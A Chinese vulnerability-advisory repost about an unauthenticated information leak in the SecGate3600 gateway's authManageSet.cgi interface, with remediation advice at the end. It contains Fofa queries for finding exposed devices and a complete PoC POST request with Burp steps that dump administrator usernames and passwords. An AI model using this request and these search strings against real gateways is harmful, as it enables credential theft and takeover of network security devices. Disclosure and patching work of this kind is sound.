漏洞情报-某神SecGate3600 authManageSet.cgi信息泄露漏洞

admin 2024年1月2日10:34:00评论59 views字数 1144阅读3分48秒阅读模式
漏洞情报-某神SecGate3600 authManageSet.cgi信息泄露漏洞
 

 

网神SecGate3600 authManageSet.cgi信息泄露漏洞

 

漏洞详情:

SecGate3600是网神信息技术(北京)股份有限公司旗下一款安全网关产品,由于网神SecGate 3600 authManageSet.cgi接口存在敏感信息泄露漏洞,未授权得攻击者可以通过此漏洞获取控制台管理员用户名密码等敏感信息,可登录控制整个后台。

影响范围

SecGate3600-A1500 v3.6.6.0(v2.64.02)

Fofa

body="sec_gate_image/login_02.gif"
fid="ldb0WVBlAgZloMw9AAge0A=="

 

 

漏洞利用

poc
POST /cgi-bin/authUser/authManageSet.cgi HTTP/1.1Host: your-ipContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateConnection: close type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc
 

使用方法:

1、使用浏览器访问目标系统,并使用BurpSuite进行拦截抓包;

漏洞情报-某神SecGate3600 authManageSet.cgi信息泄露漏洞
2、将BurpSuite拦截的GET请求包转换成POST包,并添加

/cgi-bin/authUser/authManageSet.cgi

接口地址,请求内容为:

type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc

其他内容不修改

漏洞情报-某神SecGate3600 authManageSet.cgi信息泄露漏洞

漏洞情报-某神SecGate3600 authManageSet.cgi信息泄露漏洞

 

3、当请求结果状态码返回为200后,就能从返回结果获取到登录账号密码信息,并且使用获取的账号密码可登录后台。

 

漏洞修复建议

目前厂商已发布安全版本,请联系厂商进行漏洞修复或通过以下方法进行防范漏洞:

1 将authManageSet.cgi接口特征添加WAF规则,进行网络攻击行为拦截;

2 取消互联网映射或设置指定IP访问。

 

感谢各位大佬们关注-不秃头的安全,后续会坚持更新渗透漏洞思路分享、安全测试、好用工具分享以及挖掘SRC思路等文章,同时会组织不定期抽奖,希望能得到各位的关注与支持。

 

原文始发于微信公众号(不秃头的安全):漏洞情报-某神SecGate3600 authManageSet.cgi信息泄露漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月2日10:34:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞情报-某神SecGate3600 authManageSet.cgi信息泄露漏洞http://cn-sec.com/archives/2355242.html

发表评论

匿名网友 填写信息